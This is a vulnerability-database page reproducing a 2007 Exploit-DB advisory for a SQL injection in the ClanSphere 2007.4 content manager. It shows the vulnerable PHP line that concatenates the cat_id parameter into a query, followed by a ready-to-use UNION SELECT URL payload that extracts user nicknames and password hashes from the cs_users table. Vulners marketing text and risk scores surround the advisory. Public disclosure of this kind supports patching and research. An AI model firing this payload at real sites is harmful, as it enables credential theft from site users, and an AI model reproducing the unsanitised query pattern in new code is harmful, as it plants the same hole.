Lucene search
+L

ClanSphere 2007.4 - 'cat_id' SQL Injection

🗓️ 22 Sep 2007 00:00:00Reported by IHTeamType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 38 Views

'ClanSphere 2007.4' SQL Injection vulnerability in mods/banners/navlist.ph

Related
Code
ReporterTitlePublishedViews
Family
CVE
CVE-2007-5061
24 Sep 200722:00
cve
Cvelist
CVE-2007-5061
24 Sep 200722:00
cvelist
EUVD
EUVD-2007-5042
7 Oct 202500:30
euvd
NVD
CVE-2007-5061
24 Sep 200722:17
nvd
Prion
Sql injection
24 Sep 200722:17
prion
#########################################################################################
#
#        Inclusion Hunter Team
#        http://www.ihteam.net
#
#
#         [Clansphere 2007.4]
#
#
# Class:     SQL Injection
# Found:     22/09/2007
# Remote:    Yes
# Site:      http://www.clansphere.net/
# Download:  http://sourceforge.net/project/showfiles.php?group_id=95430
#
#########################################################################################


       Vulnerable code:
       mods/banners/navlist.php
============================================================================================================
if(!empty($_GET['cat_id'])) {
 $where = "categories_id = '" . $_GET['cat_id'] . "'";
============================================================================================================




       Exploit (!!!WORK ONLY WITH magic_quotes_gpc = Off!!!):
===================================================================================================================
http://www.site.com/[path]/index.php?mod=banners&cat_id=-1'%20UNION%20ALL%20SELECT%20null,concat(users_nick,0x3a,users_pwd),null,nu

ll%20FROM%20cs_users/*
===================================================================================================================


       Thanks To:
=================================
White_Sheep for his Bugs Hunter;
=================================

# milw0rm.com [2007-09-22]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

12 Oct 2016 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.5
EPSS0.01169
38